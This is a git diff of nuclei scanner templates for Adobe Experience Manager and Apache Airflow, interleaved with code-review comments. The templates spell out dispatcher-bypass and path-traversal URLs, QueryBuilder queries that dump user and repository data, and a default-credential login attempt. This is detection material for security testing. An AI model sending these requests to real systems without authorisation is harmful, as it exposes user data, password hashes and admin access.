@@ -1,30 +1,19 @@ id: aem-groovyconsole - info: name: AEM Groovy console enabled - author: x86rd + author: twitter.com/Dheerajmadhukar severity: critical description: Groovy console is exposed, RCE is possible. reference: https://hackerone.com/reports/672243 tags: aem - requests: - method: GET path: - "{{BaseURL}}/groovyconsole" - - "{{BaseURL}}/api/groovyconsole" - - "{{BaseURL}}/aem/groovyconsole" - - "{{BaseURL}}/app/groovyconsole" - - "{{BaseURL}}/..%2f..%2f..%2fgroovyconsole" - - "{{BaseURL}}/..%2f..%2f..%2fapi/groovyconsole" - - "{{BaseURL}}/aem/..%2f..%2f..%2fgroovyconsole" - - "{{BaseURL}}/app/..%2f..%2f..%2fgroovyconsole" - headers: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US,en;q=0.9,hi;q=0.8 User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36 - matchers-condition: and matchers: - type: word @@ -36,4 +25,4 @@ requests: condition: and - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/poc/adobe/aem-jcr-querybuilder-162.yaml b/poc/adobe/aem-jcr-querybuilder-162.yaml deleted file mode 100644 index 29bc15e28f..0000000000 --- a/poc/adobe/aem-jcr-querybuilder-162.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: aem-jcr-querybuilder - -info: - author: DhiyaneshDk - name: Query JCR role via QueryBuilder Servlet - severity: info - tags: aem - -requests: - - raw: - - | - GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - '"success":true' - - 'jcr:uuid' - condition: and \ No newline at end of file 
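Review bot: The `path:` list on the new side of `aem-groovyconsole-155.yaml` is cut down to the single `{{BaseURL}}/groovyconsole` entry, so a console served under any other prefix is no longer reported and a clean result from this critical-severity check means less than it did before. If the shorter list is intentional, record that in the template, for example `# only the default mount point is probed; a console under another prefix is not covered by this check`. The word matcher itself lies between the two hunks and is not visible here.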
diff --git a/poc/adobe/aem-jcr-querybuilder-164.yaml b/poc/adobe/aem-jcr-querybuilder-164.yaml index 15a5d6c4d4..8f3e065dcf 100644 --- a/poc/adobe/aem-jcr-querybuilder-164.yaml +++ b/poc/adobe/aem-jcr-querybuilder-164.yaml @@ -1,28 +1,28 @@ -id: aem-jcr-querybuilder - -info: - name: Query JCR role via QueryBuilder Servlet - author: DhiyaneshDk - severity: info - tags: aem - -requests: - - raw: - - | - GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - '"success":true' - - 'jcr:uuid' +id: aem-jcr-querybuilder + +info: + author: DhiyaneshDk + name: Query JCR role via QueryBuilder Servlet + severity: info + tags: aem + +requests: + - raw: + - | + GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - '"success":true' + - 'jcr:uuid' condition: and \ No newline at end of file diff --git a/poc/adobe/aem-jcr-querybuilder-165.yaml b/poc/adobe/aem-jcr-querybuilder-165.yaml new file mode 100644 index 0000000000..3dfcd291c4 --- /dev/null +++ b/poc/adobe/aem-jcr-querybuilder-165.yaml 
@@ -0,0 +1,31 @@ +id: aem-jcr-querybuilder + +info: + author: DhiyaneshDk + name: Query JCR role via QueryBuilder Servlet + severity: info + tags: aem + +requests: + - raw: + - | + GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + Connection: close + Upgrade-Insecure-Requests: 1 + Cache-Control: max-age=0 + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - '"success":true' + - 'jcr:uuid' \ No newline at end of file diff --git a/poc/adobe/aem-jcr-querybuilder-166.yaml b/poc/adobe/aem-jcr-querybuilder-166.yaml index 3dfcd291c4..29bc15e28f 100644 --- a/poc/adobe/aem-jcr-querybuilder-166.yaml +++ b/poc/adobe/aem-jcr-querybuilder-166.yaml @@ -11,13 +11,9 @@ requests: - | GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate - Connection: close - Upgrade-Insecure-Requests: 1 - Cache-Control: max-age=0 matchers-condition: and matchers: @@ -28,4 +24,5 @@ requests: - type: word words: - '"success":true' - - 'jcr:uuid' \ No newline at end of file + - 'jcr:uuid' + condition: and \ No newline at end of file diff --git a/poc/adobe/aem-login-status-169.yaml b/poc/adobe/aem-login-status-167.yaml similarity index 100% rename from poc/adobe/aem-login-status-169.yaml rename to poc/adobe/aem-login-status-167.yaml diff --git a/poc/adobe/aem-merge-metadata-servlet-172.yaml b/poc/adobe/aem-merge-metadata-servlet-172.yaml index 7f4a093732..94bdc1a137 100644 
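Review bot: The second matcher in the new `aem-jcr-querybuilder-165.yaml` lists `'"success":true'` and `'jcr:uuid'` without a `condition`, and nuclei evaluates a word list without one as `or`. A 200 response containing only `"success":true` (an empty result set, for instance) is therefore reported as a JCR user listing. Add `condition: and` under the `words:` list, as the `-166` hunk later in this same patch does for its copy.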
--- a/poc/adobe/aem-merge-metadata-servlet-172.yaml +++ b/poc/adobe/aem-merge-metadata-servlet-172.yaml @@ -6,16 +6,12 @@ info: severity: info reference: - https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91 - metadata: - max-request: 1 - shodan-query: http.component:"Adobe Experience Manager" - tags: aem,misconfig + tags: aem -http: +requests: - method: GET path: - '{{BaseURL}}/libs/dam/merge/metadata.html?path=/etc&.ico' - matchers-condition: and matchers: - type: status @@ -26,5 +22,3 @@ http: words: - 'assetPaths' condition: and - -# digest: 4a0a0047304502204c5922229b04b36c72ca391555bf2cbb57bca10d36b6281cd4d4f7677fc222fa022100b04f9edf21b17af0df74d22e4d9de9706c52fe5a1e4ab6ef1d0f725d81bb0c7c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/adobe/aem-merge-metadata-servlet-174.yaml b/poc/adobe/aem-merge-metadata-servlet-174.yaml deleted file mode 100644 index 94bdc1a137..0000000000 --- a/poc/adobe/aem-merge-metadata-servlet-174.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: aem-merge-metadata-servlet - -info: - name: AEM MergeMetadataServlet - author: DhiyaneshDk - severity: info - reference: - - https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91 - tags: aem - -requests: - - method: GET - path: - - '{{BaseURL}}/libs/dam/merge/metadata.html?path=/etc&.ico' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'assetPaths' - condition: and diff --git a/poc/adobe/aem-querybuilder-internal-path-read-179.yaml b/poc/adobe/aem-querybuilder-internal-path-read-179.yaml new file mode 100644 index 0000000000..5d765ed219 --- /dev/null +++ b/poc/adobe/aem-querybuilder-internal-path-read-179.yaml 
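Review bot: Both hunks of `aem-merge-metadata-servlet-172.yaml` move the template backwards: the top-level key changes from `http:` to the legacy `requests:`, and the trailing `# digest:` line is dropped, so the file can no longer be checked against the signature it previously carried. The `metadata` block (`max-request`, `shodan-query`) and the `misconfig` tag are removed as well. Unless the nuclei version in use requires the old key, keep `http:` and the signed text unchanged. The same regression is applied to `aem-userinfo-servlet.yaml`, `airflow-debug.yaml` and `unauthenticated-airflow.yaml` further down in this patch.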
@@ -0,0 +1,30 @@ +id: aem-querybuilder-internal-path-read + +info: + name: AEM QueryBuilder Internal Path Read + author: DhiyaneshDk + severity: medium + reference: + - https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91 + tags: aem + +requests: + - method: GET + path: + - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1' + - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1' + - '{{BaseURL}}/bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1' + - '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'jcr:path' + - 'success' + condition: and \ No newline at end of file diff --git a/poc/adobe/aem-querybuilder-internal-path-read-180.yaml b/poc/adobe/aem-querybuilder-internal-path-read-180.yaml deleted file mode 100644 index 5e8033b220..0000000000 --- a/poc/adobe/aem-querybuilder-internal-path-read-180.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: aem-querybuilder-internal-path-read -info: - author: DhiyaneshDk - name: AEM QueryBuilder Internal Path Read - severity: medium - reference: https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91 - tags: aem -requests: - - method: GET - path: - - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1' - - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1' - - '{{BaseURL}}/bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1' - - '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - 'jcr:path' - - 'success' - condition: and 
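Review bot: All four paths in the new `aem-querybuilder-internal-path-read-179.yaml` end in `p.hits=full&p.limit=-1`, which asks for an unbounded result set with full properties under `/home` or `/etc`, although the matcher only needs `jcr:path` and `success` to appear once. On a large repository that is a heavy query against a production instance, and it pulls far more user data into scan output than a detection requires. A bounded request proves the same exposure: use `p.limit=1` in place of `p.limit=-1`. The info block also has no `description`; one line naming the fix (anonymous requests to `/bin/querybuilder.json` should be denied at the dispatcher) would tell the reader what to change.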
diff --git a/poc/adobe/aem-querybuilder-json-servlet-182.yaml b/poc/adobe/aem-querybuilder-json-servlet-182.yaml index 1099f8bdd7..073fc99968 100644 --- a/poc/adobe/aem-querybuilder-json-servlet-182.yaml +++ b/poc/adobe/aem-querybuilder-json-servlet-182.yaml @@ -1,30 +1,42 @@ -id: aem-querybuilder-json-servlet - -info: - author: DhiyaneshDk - name: AEM QueryBuilder Json Servlet - severity: info - reference: https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html - tags: aem - - -requests: - - method: GET - path: - - '{{BaseURL}}/bin/querybuilder.json' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "application/json" - part: header - - - type: word - words: - - 'success' - - 'results' - condition: and +id: aem-querybuilder-json-servlet + +info: + author: DhiyaneshDk + name: AEM QueryBuilder Json Servlet + severity: info + description: Sensitive information might be exposed via AEMs QueryBuilderServlet or QueryBuilderFeedServlet. + reference: + - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html + - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/QueryBuilderExposed.java + tags: aem,adobe + + +requests: + - method: GET + path: + - '{{BaseURL}}/bin/querybuilder.json' + - '{{BaseURL}}/bin/querybuilder.json.servlet' + - '{{BaseURL}}///bin///querybuilder.json' + - '{{BaseURL}}///bin///querybuilder.json.servlet' + - '{{BaseURL}}/bin/querybuilder.feed' + - '{{BaseURL}}/bin/querybuilder.feed.servlet' + - '{{BaseURL}}///bin///querybuilder.feed' + - ' {{BaseURL}}///bin///querybuilder.feed.servlet' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "application/json" + part: header + + - type: word + words: + - 'success' + - 'results' + condition: and 
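Review bot: The last added path, `' {{BaseURL}}///bin///querybuilder.feed.servlet'`, has a space inside the quotes before `{{BaseURL}}`, so that request is built from a URL with a leading blank and will most likely be rejected as malformed. It should read `- '{{BaseURL}}///bin///querybuilder.feed.servlet'`. Separately, the four `querybuilder.feed` paths are evaluated by the same header matcher that requires `application/json`. If the feed servlet answers with an XML or Atom content type, as its name suggests, those requests can never match and the added coverage is only apparent. Give the feed paths their own request block with a fitting content-type check, or drop them.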
diff --git a/poc/adobe/aem-secrets.yaml b/poc/adobe/aem-secrets.yaml new file mode 100644 index 0000000000..4ac0aaf165 --- /dev/null +++ b/poc/adobe/aem-secrets.yaml @@ -0,0 +1,44 @@ +id: aem-secrets + +info: + name: AEM Secrets - Sensitive Information Disclosure + author: j3ssie & boobooHQ + severity: high + reference: + - https://www.linkedin.com/feed/update/urn:li:activity:7066003031271616513/ + description: | + Possible Juicy Files can be discovered at this endpoint. Search / Grep for secrets like hashed passwords ( SHA ) , internal email disclosure etc. + metadata: + max-request: 2 + verified: "true" + tags: aem,adobe,misconfig,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json" + - "{{BaseURL}}/..;//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json" + + headers: + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Language: en-US,en;q=0.9,hi;q=0.8 + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"jcr:uuid"' + - '"jcr:createdBy"' + - '"uri"' + condition: and + + - type: word + part: header + words: + - application/json + + - type: status + status: + - 200 diff --git a/poc/adobe/aem-setpreferences-xss.yaml b/poc/adobe/aem-setpreferences-xss.yaml deleted file mode 100644 index 50e7da80ff..0000000000 --- a/poc/adobe/aem-setpreferences-xss.yaml +++ /dev/null 
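Review bot: The `description` in the new `aem-secrets.yaml` tells the reader to "Search / Grep for secrets" but not what the finding is or what to do about it. A wording such as `description: The forms validator selector returns JCR content under /home as JSON without authentication; the output can include password hashes and internal e-mail addresses.` states the exposure as far as the request and matchers show it. A second sentence should name the response: deny the selector path at the dispatcher and treat any disclosed hashes as compromised. `verified: "true"` is a quoted string here, while `apache-answer-detect.yaml` in this patch uses the bare boolean.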
@@ -1,30 +0,0 @@ -id: aem-setpreferences-xss - -info: - name: AEM setPreferences XSS - author: zinminphy0,dhiyaneshDK - reference: - - https://www.youtube.com/watch?v=VwLSUHNhrOw&t=142s - - https://github.com/projectdiscovery/nuclei-templates/issues/3225 - - https://twitter.com/zin_min_phyo/status/1465394815042916352 - severity: medium - tags: aem,xss - -requests: - - method: GET - path: - - "{{BaseURL}}/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=//a" - - "{{BaseURL}}/content/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=//a" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - "" - - 'A JSONObject text must begin with' - condition: and - - - type: status - status: - - 400 \ No newline at end of file diff --git a/poc/adobe/aem-userinfo-servlet-192.yaml b/poc/adobe/aem-userinfo-servlet-192.yaml deleted file mode 100644 index a18d740fa1..0000000000 --- a/poc/adobe/aem-userinfo-servlet-192.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: aem-userinfo-servlet - -info: - name: AEM UserInfo Servlet Credentials Exposure - author: DhiyaneshDk - severity: info - description: "Adobe Experience Manager UserInfoServlet is exposed which allows an attacker to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node." - tags: aem,bruteforce - -requests: - - method: GET - path: - - '{{BaseURL}}/libs/cq/security/userinfo.json' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - '"userID":' - - '"userName":' - condition: and - - - type: word - part: header - words: - - 'application/json' - -# Enhanced by mp on 2022/04/05 diff --git a/poc/adobe/aem-userinfo-servlet-193.yaml b/poc/adobe/aem-userinfo-servlet-193.yaml new file mode 100644 index 0000000000..0fe58a4195 --- /dev/null +++ b/poc/adobe/aem-userinfo-servlet-193.yaml 
@@ -0,0 +1,25 @@ +id: aem-userinfo-servlet + +info: + author: DhiyaneshDk + name: AEM UserInfo Servlet + severity: info + description: UserInfoServlet is exposed, it allows to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node. + tags: aem + + +requests: + - method: GET + path: + - '{{BaseURL}}/libs/cq/security/userinfo.json' + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'userName' + - 'userID' + condition: and diff --git a/poc/adobe/aem-userinfo-servlet.yaml b/poc/adobe/aem-userinfo-servlet.yaml index 319dc32467..a18d740fa1 100644 --- a/poc/adobe/aem-userinfo-servlet.yaml +++ b/poc/adobe/aem-userinfo-servlet.yaml @@ -5,16 +5,12 @@ info: author: DhiyaneshDk severity: info description: "Adobe Experience Manager UserInfoServlet is exposed which allows an attacker to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node." - metadata: - max-request: 1 - shodan-query: http.component:"Adobe Experience Manager" - tags: aem,bruteforce,misconfig + tags: aem,bruteforce -http: +requests: - method: GET path: - '{{BaseURL}}/libs/cq/security/userinfo.json' - matchers-condition: and matchers: - type: status @@ -33,4 +29,4 @@ http: words: - 'application/json' -# digest: 4a0a00473045022006348e31c7ddb5d35d735663bd90b53b35c040db39a04948a9f1e79c8bafa9fb022100b71d1a5aaa46d7c2b9556484144ee9587c9bd3ffaf54ffd7520841d4358653b4:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/04/05 diff --git a/poc/adobe/aem-xss-childlist-selector-197.yaml b/poc/adobe/aem-xss-childlist-selector-198.yaml similarity index 100% rename from poc/adobe/aem-xss-childlist-selector-197.yaml rename to poc/adobe/aem-xss-childlist-selector-198.yaml 
diff --git a/poc/adobe/aem-xss-childlist-selector.yaml b/poc/adobe/aem-xss-childlist-selector.yaml deleted file mode 100644 index c8551970bf..0000000000 --- a/poc/adobe/aem-xss-childlist-selector.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: aem-xss-childlist-selector - -info: - name: XSS in childlist selector - author: dhiyaneshDk - severity: medium - description: | - Requests using the selector childlist can an XSS when the dispatcher does not respect the content-type responded by AEM and flips from application/json to text/html. As a consequence the reflected suffix is executed and interpreted in the browser. - reference: - - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/xss/FlippingTypeWithChildrenlistSelector.java - metadata: - shodan-query: - - http.title:"AEM Sign In" - - http.component:"Adobe Experience Manager" - tags: xss,aem,adobe - -requests: - - method: GET - path: - - '{{BaseURL}}/etc/designs/xh1x.childrenlist.json//.html' - - matchers-condition: and - matchers: - - type: word - words: - - '' - - '{"path":"/etc/designs/xh1x.childrenlist.json' - condition: and - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/poc/adobe/possible-AEM-secrets.yaml b/poc/adobe/possible-AEM-secrets.yaml deleted file mode 100644 index 198c19fcd3..0000000000 --- a/poc/adobe/possible-AEM-secrets.yaml +++ /dev/null 
@@ -1,46 +0,0 @@ -id: aem-secrets - -info: - name: AEM Secrets - Sensitive Information Disclosure - author: boobooHQ,j3ssie - severity: high - description: | - Possible Juicy Files can be discovered at this endpoint. Search / Grep for secrets like hashed passwords ( SHA ) , internal email disclosure etc. - reference: - - https://www.linkedin.com/feed/update/urn:li:activity:7066003031271616513/ - metadata: - verified: true - max-request: 2 - tags: aem,adobe,misconfig,exposure - -http: - - method: GET - path: - - "{{BaseURL}}//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json" - - "{{BaseURL}}/..;//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json" - - headers: - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Language: en-US,en;q=0.9,hi;q=0.8 - stop-at-first-match: true - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"jcr:uuid"' - - '"jcr:createdBy"' - - '"uri"' - condition: and - - - type: word - part: header - words: - - application/json - - - type: status - status: - - 200 - -# digest: 4b0a00483046022100f26aef400ffc895f1d84d377c7c8889af3a56490902382de4d7e2504f59b48bc02210090f54e744e9f760d4a740a9b6d7fe6a61d4904e4823b4d43318598fd8b2b10ce:922c64590222798bb761d5b6d8e72950 diff --git a/poc/airflow/airflow-configuration-exposure-230.yaml b/poc/airflow/airflow-configuration-exposure-230.yaml new file mode 100644 index 0000000000..cf3c868a49 --- /dev/null +++ b/poc/airflow/airflow-configuration-exposure-230.yaml 
@@ -0,0 +1,28 @@ +id: airflow-configuration-exposure + +info: + name: Apache Airflow Configuration Page - Detect + author: pdteam + severity: medium + description: Apache Airflow configuration page was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: exposure,config,airflow,apache + +http: + - method: GET + path: + - '{{BaseURL}}/airflow.cfg' + + matchers: + - type: word + words: + - '[core]' + - '[api]' + condition: and + +# digest: 490a0046304402206aceac3eef9d1011acca2593ab1f1074b0c2660f72664032cd16f303ce92a0560220386b52c069575817b5cf264f62693e1c71440f7d7b50f57bd589cae2c37c8f1d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/airflow/airflow-configuration-exposure.yaml b/poc/airflow/airflow-configuration-exposure.yaml deleted file mode 100644 index f4ae81eff2..0000000000 --- a/poc/airflow/airflow-configuration-exposure.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: airflow-configuration-exposure -info: - name: Apache Airflow Configuration Exposure - author: pdteam - severity: medium - tags: exposure,config,airflow,apache -requests: - - method: GET - path: - - '{{BaseURL}}/airflow.cfg' - matchers: - - type: word - words: - - '[core]' - - '[api]' - condition: and diff --git a/poc/airflow/airflow-debug-231.yaml b/poc/airflow/airflow-debug-231.yaml new file mode 100644 index 0000000000..dc6f4a4a58 --- /dev/null +++ b/poc/airflow/airflow-debug-231.yaml @@ -0,0 +1,26 @@ +id: airflow-debug + +info: + name: Airflow Debug Trace + author: pdteam + severity: low + tags: apache,airflow,fpd + +requests: + - method: GET + path: + - "{{BaseURL}}/admin/airflow/login" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "

Ooops.

" + - "Traceback (most recent call last)" + condition: and + + - type: status + status: + - 500 \ No newline at end of file diff --git a/poc/airflow/airflow-debug-233.yaml b/poc/airflow/airflow-debug-233.yaml deleted file mode 100644 index 7e88c457d2..0000000000 --- a/poc/airflow/airflow-debug-233.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: airflow-debug - -info: - name: Airflow Debug Trace - author: pdteam - severity: low - metadata: - verified: true - shodan-query: title:"Airflow - DAGs" - tags: apache,airflow,fpd - -requests: - - method: GET - path: - - "{{BaseURL}}/admin/airflow/login" - - matchers-condition: and - matchers: - - - type: word - part: body - words: - - "

Ooops.

" - - "Traceback (most recent call last)" - condition: and - - - type: status - status: - - 500 \ No newline at end of file diff --git a/poc/airflow/airflow-debug.yaml b/poc/airflow/airflow-debug.yaml index ffa52793bb..7e88c457d2 100644 --- a/poc/airflow/airflow-debug.yaml +++ b/poc/airflow/airflow-debug.yaml @@ -6,17 +6,17 @@ info: severity: low metadata: verified: true - max-request: 1 shodan-query: title:"Airflow - DAGs" - tags: apache,airflow,fpd,misconfig + tags: apache,airflow,fpd -http: +requests: - method: GET path: - "{{BaseURL}}/admin/airflow/login" matchers-condition: and matchers: + - type: word part: body words: @@ -26,6 +26,4 @@ http: - type: status status: - - 500 - -# digest: 4b0a00483046022100b0ea0db6c142be41661edcaf91e3bb8d88c6132645bbf40c5e4697385296b834022100f8a1945ee062c86ee2c263742a596de6b4c2fea61711a88cfb27ccf78026d656:922c64590222798bb761d5b6d8e72950 + - 500 \ No newline at end of file diff --git a/poc/airflow/airflow-default-login-236.yaml b/poc/airflow/airflow-default-login-236.yaml index 7addbc0c1a..cef2568e5d 100644 --- a/poc/airflow/airflow-default-login-236.yaml +++ b/poc/airflow/airflow-default-login-236.yaml @@ -1,27 +1,18 @@ id: airflow-default-login - info: name: Apache Airflow Default Login author: pdteam - severity: high - description: An Apache Airflow default login was discovered. - reference: - - https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html + severity: critical + tags: airflow,default-login,apache + reference: https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html metadata: shodan-query: title:"Sign In - Airflow" - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - tags: airflow,default-login,apache - requests: - raw: - | GET /login/ HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - - | POST /login/ HTTP/1.1 Host: {{Hostname}} 
@@ -30,14 +21,12 @@ requests: Referer: {{BaseURL}}/admin/airflow/login username={{username}}&password={{password}}&_csrf_token={{csrf_token}} - attack: pitchfork payloads: username: - airflow password: - airflow - cookie-reuse: true extractors: - type: regex @@ -46,7 +35,6 @@ requests: internal: true regex: - 'type="hidden" value="(.*?)">' - req-condition: true matchers-condition: and matchers: @@ -56,9 +44,6 @@ requests: - 'contains(all_headers_2, "session=.")' - 'status_code_2 == 302' condition: and - - type: word words: - 'You should be redirected automatically to target URL: ' - -# Enhanced by mp on 2022/03/22 diff --git a/poc/airflow/airflow-detect-239.yaml b/poc/airflow/airflow-detect-239.yaml deleted file mode 100644 index f2d6d97aa2..0000000000 --- a/poc/airflow/airflow-detect-239.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: airflow-detect - -info: - name: Apache Airflow - author: pdteam - severity: info - tags: tech,apache,airflow - -requests: - - method: GET - path: - - "{{BaseURL}}/{{randstr}}" - - matchers-condition: and - matchers: - - - type: word - part: body - words: - - "Airflow 404 = lots of circles" - - - type: status - status: - - 404 \ No newline at end of file diff --git a/poc/airflow/airflow-detect-240.yaml b/poc/airflow/airflow-detect-240.yaml new file mode 100644 index 0000000000..5306691e5b --- /dev/null +++ b/poc/airflow/airflow-detect-240.yaml @@ -0,0 +1,24 @@ +id: airflow-detect + +info: + name: Apache Airflow + author: pdteam + severity: info + tags: tech,apache,airflow + +requests: + - method: GET + path: + - "{{BaseURL}}/{{randstr}}" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Airflow 404 = lots of circles" + + - type: status + status: + - 404 diff --git a/poc/airflow/airflow-panel-242.yaml b/poc/airflow/airflow-panel-242.yaml new file mode 100644 index 0000000000..3b97fec8be --- /dev/null +++ b/poc/airflow/airflow-panel-242.yaml 
@@ -0,0 +1,24 @@ +id: airflow-panel + +info: + name: Airflow Admin login + author: pdteam + severity: info + tags: panel,apache,airflow + +requests: + - method: GET + path: + - "{{BaseURL}}/admin/airflow/login" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Airflow - Login" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/airflow/airflow-panel-241.yaml b/poc/airflow/airflow-panel-244.yaml similarity index 100% rename from poc/airflow/airflow-panel-241.yaml rename to poc/airflow/airflow-panel-244.yaml diff --git a/poc/airflow/airflow-panel-245.yaml b/poc/airflow/airflow-panel-245.yaml index 47a13475f4..05b609b98f 100644 --- a/poc/airflow/airflow-panel-245.yaml +++ b/poc/airflow/airflow-panel-245.yaml @@ -1,28 +1,19 @@ id: airflow-panel - info: name: Airflow Admin login author: pdteam severity: info tags: panel,apache,airflow - metadata: - shodan-query: title:"Sign In - Airflow" - requests: - method: GET path: - - "{{BaseURL}}/login/" - "{{BaseURL}}/admin/airflow/login" - - stop-at-first-match: true matchers-condition: and matchers: - type: word + part: body words: - "Airflow - Login" - - "Sign In - Airflow" - condition: or - - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/poc/airflow/unauthenticated-airflow-10884.yaml b/poc/airflow/unauthenticated-airflow-10884.yaml new file mode 100644 index 0000000000..50ca17d92a --- /dev/null +++ b/poc/airflow/unauthenticated-airflow-10884.yaml @@ -0,0 +1,27 @@ +id: unauthenticated-airflow-instance + +info: + name: Unauthenticated Airflow Instance + author: dhiyaneshDK + severity: high + tags: apache,airflow,unauth + metadata: + shodan-query: title:"Airflow - DAGs" + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/admin/" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Airflow - DAGs" + + - type: status + status: + - 200 
